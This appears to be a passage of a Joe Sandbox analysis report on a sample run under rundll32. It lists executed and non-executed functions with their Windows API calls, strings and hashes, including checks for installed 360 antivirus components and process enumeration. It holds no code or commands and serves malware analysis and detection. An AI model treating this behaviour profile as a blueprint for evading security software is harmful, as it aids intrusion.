Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
Instruction ID: a78d09c2f96e601caed5b0db53cb0b16841fdf885f5d41d9c91e06d8dd30598e
Opcode Fuzzy Hash: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
Instruction Fuzzy Hash: E5414B21184E2086FA786B64A80D369E293BB40B6CF100F35F46E966DDDB3CF74D8B41

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE8820 Relevance: 6.0, APIs: 4, Instructions: 28
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000235B5CE8836
Process32FirstW.KERNEL32 ref: 00000235B5CE8862
Process32NextW.KERNEL32 ref: 00000235B5CE8880
CloseHandle.KERNEL32 ref: 00000235B5CE888F

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction ID: d54c8180978363d067f9f06892bb3dd176303eabe8c597f0926567ac0c22fdd8
Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction Fuzzy Hash: 3601FB32618E50C7E7A4DB11E84871AB7A2F7C8B4CF441625B68E8666CDF7CC61ACB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000000180070201
VirtualAlloc.KERNELBASE ref: 0000000180070272

Strings

&$58, xrefs: 0000000180070248

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: &$58
API String ID: 4275171209-292207594
Opcode ID: 4f173b11b85c9be10da8eb9948744f72f75bdffef8083b501ef1bcff6fad96bb
Instruction ID: dc3067c45e012cfe901e309ad5e26282e7953dc62dc132df2a3d5b0976b166a3
Opcode Fuzzy Hash: 4f173b11b85c9be10da8eb9948744f72f75bdffef8083b501ef1bcff6fad96bb
Instruction Fuzzy Hash: 6021263371169886CB6ACF74B158BADABA5B748BC8F1590268F4E17F55C93DD10AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000000180070201
VirtualAlloc.KERNELBASE ref: 0000000180070272

Strings

&$58, xrefs: 0000000180070248

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: &$58
API String ID: 4275171209-292207594
Opcode ID: 11a750e4170a9ad4c562e75150ed66c3a2dc3f508a0205cd01daf590c50fbe37
Instruction ID: 23527d6a8d6615ab95d8207fcdc7229d218c2df4260ae3193873eea517917a3c
Opcode Fuzzy Hash: 11a750e4170a9ad4c562e75150ed66c3a2dc3f508a0205cd01daf590c50fbe37
Instruction Fuzzy Hash: 0421233271179486CB6ACF35A158FADABA5B718BC8F169016CF8E17F55C93DD109C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070200 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000000180070201
VirtualAlloc.KERNELBASE ref: 0000000180070272

Strings

&$58, xrefs: 0000000180070248

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: &$58
API String ID: 4275171209-292207594
Opcode ID: a6f1ea9488f9dd4da2db5fb67a2fd5314731c71e78e17318f66e63a2c9041829
Instruction ID: d87006d348cf916555d4c40589e898ccdcab4414593187567b45beb92d847496
Opcode Fuzzy Hash: a6f1ea9488f9dd4da2db5fb67a2fd5314731c71e78e17318f66e63a2c9041829
Instruction Fuzzy Hash: 5421333271139886CB6ACF74A158FADABA1B708BC4F169115CE8E17F06C93DD109C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEB400 Relevance: 4.5, APIs: 3, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00000235B5CEB498
CloseHandle.KERNEL32 ref: 00000235B5CEB4AB
CloseHandle.KERNEL32 ref: 00000235B5CEB4B6

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID:
API String ID: 2922976086-0
Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction ID: 3b78ee313de7232d1a869e78acc0615bbc80471067246dea7ae50a12e4bd1c2f
Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction Fuzzy Hash: 5111E972618B9086E7A4CB64F44875BF7A2F3C4758F504925A78D82AA8DBBCC55CCF00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE89D4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

FindFirstVolumeW.KERNEL32 ref: 00000235B5CE8A0E
GetVolumeInformationW.KERNEL32 ref: 00000235B5CE8A62
FindVolumeClose.KERNEL32 ref: 00000235B5CE8A71

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Volume$Find$CloseFirstInformation
String ID:
API String ID: 586543143-0
Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction ID: 6d91bdfa48d2a6c5c65660b751ef40cb035bc8d1c0af9904e6ad780c6e58e16c
Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction Fuzzy Hash: 8111F132118F50D6D7A4DB10E44939AB7A2F384754F940636E29E426ECDF7CC65DCB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE3C2C Relevance: 4.5, APIs: 3, Instructions: 15synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00000235B5CE3C49
ReleaseMutex.KERNEL32 ref: 00000235B5CE3C60
CloseHandle.KERNEL32 ref: 00000235B5CE3C6D

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandleMutexRelease
String ID:
API String ID: 3391745777-0
Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction ID: c246a3f3428d177adb8654da7e65b531946e9a83f2d567d52e47fde0a2697c02
Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction Fuzzy Hash: 78F05265504F6082E7DA9B14EC4C314AB63F784F4DF500915E84F62278CF7CE69DCA14

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0000000180070272

Strings

&$58, xrefs: 0000000180070248

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: &$58
API String ID: 4275171209-292207594
Opcode ID: b6a3a98d28c9259cb78a12b48d44ca555a7ad990dfd794d5708a1868dd1c73ff
Instruction ID: cbf57c0b74e788f2119e0e4766543ca7679dc5ca0df739001d034443fdc2105d
Opcode Fuzzy Hash: b6a3a98d28c9259cb78a12b48d44ca555a7ad990dfd794d5708a1868dd1c73ff
Instruction Fuzzy Hash: 4021F07231139886CA69CF75A248FA9ABA5B708BC4F1691158F8E27F45CA3DE10AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE88F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

RtlFormatCurrentUserKeyPath.NTDLL ref: 00000235B5CE896F

Part of subcall function 00000235B5CE7B40: NtFreeVirtualMemory.NTDLL ref: 00000235B5CE7B71

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentFormatFreeMemoryPathUserVirtual
String ID:
API String ID: 2593304397-0
Opcode ID: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
Instruction ID: 7747847ccb625b6adf9f0893e08da16fe8725d6a47ec516e30b0c5c5e93ed111
Opcode Fuzzy Hash: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
Instruction Fuzzy Hash: 0C219522654E5181EAB49B10E44936AF363F78438CF401C35A6CE825ADEB2CD70D8745

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7414 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00000235B5CE7428

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction ID: ccc31c42e9519b15fa1067a1d142642bd08fcb669af0827ee3db38c86cfa99da
Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction Fuzzy Hash: 73E09231638ED186EBA98B34E84A32AAAD3E381354F601930A9DB811C8DB6CD51C9E00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000018004A650 Relevance: 79.3, APIs: 37, Strings: 8, Instructions: 513filesleepmemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004A762
GetModuleFileNameW.KERNEL32 ref: 000000018004A778
PathAppendW.SHLWAPI ref: 000000018004A79A
ShellExecuteExW.SHELL32 ref: 000000018004A7D9
ILGetSize.SHELL32 ref: 000000018004A879
GetTickCount.KERNEL32 ref: 000000018004A8A3
srand.MSVCRT ref: 000000018004A8AB
GetCurrentProcess.KERNEL32 ref: 000000018004A8C4
GetProcessId.KERNEL32 ref: 000000018004A8CD
GetCurrentThreadId.KERNEL32 ref: 000000018004A8FF
rand.MSVCRT ref: 000000018004A907
LocalAlloc.KERNEL32 ref: 000000018004A956
InitializeSecurityDescriptor.ADVAPI32 ref: 000000018004A96C
LocalFree.KERNEL32 ref: 000000018004A979
SetSecurityDescriptorDacl.ADVAPI32 ref: 000000018004A9D6
CreateFileMappingW.KERNEL32 ref: 000000018004AA10
LocalFree.KERNEL32 ref: 000000018004AA1E
CreateFileMappingW.KERNEL32 ref: 000000018004AA59
MapViewOfFile.KERNEL32 ref: 000000018004AA84
CloseHandle.KERNEL32 ref: 000000018004AA97
memset.MSVCRT ref: 000000018004AAAC
memmove.MSVCRT ref: 000000018004AB4C
memmove.MSVCRT ref: 000000018004AB67
memmove.MSVCRT ref: 000000018004ABB3
memmove.MSVCRT ref: 000000018004ABCC
memmove.MSVCRT ref: 000000018004AC8F
UnmapViewOfFile.KERNEL32 ref: 000000018004ACA8
FindWindowW.USER32 ref: 000000018004ACC1
SetForegroundWindow.USER32 ref: 000000018004ACCF
memset.MSVCRT ref: 000000018004ACE4
wsprintfW.USER32 ref: 000000018004AD17
memset.MSVCRT ref: 000000018004AD2E
WaitForSingleObject.KERNEL32 ref: 000000018004AE1F
Sleep.KERNEL32 ref: 000000018004AE34
CloseHandle.KERNEL32 ref: 000000018004AE4C
CloseHandle.KERNEL32 ref: 000000018004AE5B
CloseHandle.KERNEL32 ref: 000000018004AE66

Strings

se2, xrefs: 000000018004AD07
..\360DeskAna64.exe, xrefs: 000000018004A78C
/%s %s %u, xrefs: 000000018004ACF1
open, xrefs: 000000018004A654
se1, xrefs: 000000018004AD10
Progman, xrefs: 000000018004ACBA
%u_%d_%d_%d_%u, xrefs: 000000018004A92D
Program manager, xrefs: 000000018004ACB3

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
API String ID: 1121195023-828389715
Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010580 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 237registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800105C6
GetModuleFileNameW.KERNEL32 ref: 00000001800105DD
memset.MSVCRT ref: 00000001800105EF
RegOpenKeyExW.ADVAPI32 ref: 000000018001061C
RegQueryValueExW.ADVAPI32 ref: 0000000180010660
RegCloseKey.ADVAPI32 ref: 000000018001066B
PathAddBackslashW.SHLWAPI ref: 0000000180010684
StrCmpNIW.SHLWAPI ref: 00000001800106C8
memset.MSVCRT ref: 00000001800106E0
PathFileExistsW.SHLWAPI ref: 000000018001071C
memset.MSVCRT ref: 0000000180010734
PathFileExistsW.SHLWAPI ref: 0000000180010769
memset.MSVCRT ref: 000000018001077B
PathFileExistsW.SHLWAPI ref: 00000001800107AC

Strings

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe, xrefs: 0000000180010896
%s\%s, xrefs: 00000001800106EF
safemon\FreeSaaS.tpi, xrefs: 0000000180010780
360SkinMgr.exe, xrefs: 0000000180010916
safemon\pedrver.dll, xrefs: 0000000180010739
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 000000018001060B
360leakfixer.exe, xrefs: 00000001800106E5
safemon\360Cactus.tpi, xrefs: 0000000180010834
Path, xrefs: 0000000180010655, 00000001800108D7
hipsver.dll, xrefs: 00000001800107E7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
API String ID: 4260417939-4002867936
Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001ECF4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 323fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018001ED67
GetFileSizeEx.KERNEL32 ref: 000000018001ED80
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001EDA6
ReadFile.KERNEL32 ref: 000000018001EDCE
CloseHandle.KERNEL32 ref: 000000018001EDDD
SetFilePointer.KERNEL32 ref: 000000018001EE03
ReadFile.KERNEL32 ref: 000000018001EE20
SetFilePointer.KERNEL32 ref: 000000018001EE63
ReadFile.KERNEL32 ref: 000000018001EE80
SetFilePointer.KERNEL32 ref: 000000018001EF14
ReadFile.KERNEL32 ref: 000000018001EF31
SetFilePointer.KERNEL32 ref: 000000018001EFB0
ReadFile.KERNEL32 ref: 000000018001EFCD
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F007
MultiByteToWideChar.KERNEL32 ref: 000000018001F034

Part of subcall function 0000000180036EC8: wcschr.MSVCRT ref: 0000000180036F7A
Part of subcall function 0000000180036EC8: _wcslwr.MSVCRT ref: 0000000180036FC8

SetFilePointer.KERNEL32 ref: 000000018001F064
ReadFile.KERNEL32 ref: 000000018001F07D
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F0A6
memmove.MSVCRT ref: 000000018001F0C1
memmove.MSVCRT ref: 000000018001F0EE
memmove.MSVCRT ref: 000000018001F117
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F172
CloseHandle.KERNEL32 ref: 000000018001F17E
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F195
CloseHandle.KERNEL32 ref: 000000018001F1A5

Strings

9, xrefs: 000000018001EF82

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
String ID: 9
API String ID: 2469906296-2366072709
Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062148 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006217C
GetModuleFileNameW.KERNEL32 ref: 0000000180062193
PathCombineW.SHLWAPI ref: 00000001800621AA

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800621DB
GetProcAddress.KERNEL32 ref: 00000001800621EF
GetProcAddress.KERNEL32 ref: 0000000180062203
GetProcAddress.KERNEL32 ref: 0000000180062217
GetProcAddress.KERNEL32 ref: 000000018006222B
GetProcAddress.KERNEL32 ref: 000000018006223F
GetProcAddress.KERNEL32 ref: 0000000180062253
GetProcAddress.KERNEL32 ref: 0000000180062267
GetProcAddress.KERNEL32 ref: 000000018006227B
GetProcAddress.KERNEL32 ref: 000000018006228F
FreeLibrary.KERNEL32 ref: 00000001800622DD

Strings

EnumProcessModules64, xrefs: 0000000180062209
GetModuleFileNameExW64, xrefs: 00000001800621F5
IsProcessWow64Process, xrefs: 0000000180062245
GetModuleInformation64, xrefs: 0000000180062259
GetModuleBaseNameW64, xrefs: 00000001800621E1
GetCurrentDirectory64, xrefs: 0000000180062231
NtQueryInformationProcess64, xrefs: 0000000180062281
..\ipc\x64for32lib.dll, xrefs: 0000000180062199
GetCommandLine64, xrefs: 000000018006221D
NtQueryInformationThread64, xrefs: 000000018006226D
ReadProcessMemory64, xrefs: 00000001800621D1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
API String ID: 3359005274-2277939915
Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002610 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 416registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180002691
memset.MSVCRT ref: 00000001800026A3
memset.MSVCRT ref: 00000001800026C1
memset.MSVCRT ref: 000000018000275C
memset.MSVCRT ref: 0000000180002771
RegOpenKeyExW.ADVAPI32 ref: 0000000180002824
RegEnumKeyW.ADVAPI32 ref: 000000018000286C
RegOpenKeyExW.ADVAPI32 ref: 0000000180002964
free.MSVCRT ref: 0000000180002A97
RegCloseKey.ADVAPI32 ref: 0000000180002AD2
RegCloseKey.ADVAPI32 ref: 0000000180002AFB
RegCloseKey.ADVAPI32 ref: 0000000180002D4B

Strings

\Products\, xrefs: 00000001800028DF
\Features\, xrefs: 000000018000290E
\Components\, xrefs: 0000000180002BB2
HKEY_LOCAL_MACHINE\, xrefs: 0000000180002CA7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset$Close$Open$Enumfree
String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
API String ID: 1285027818-2258373985
Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE1030 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON

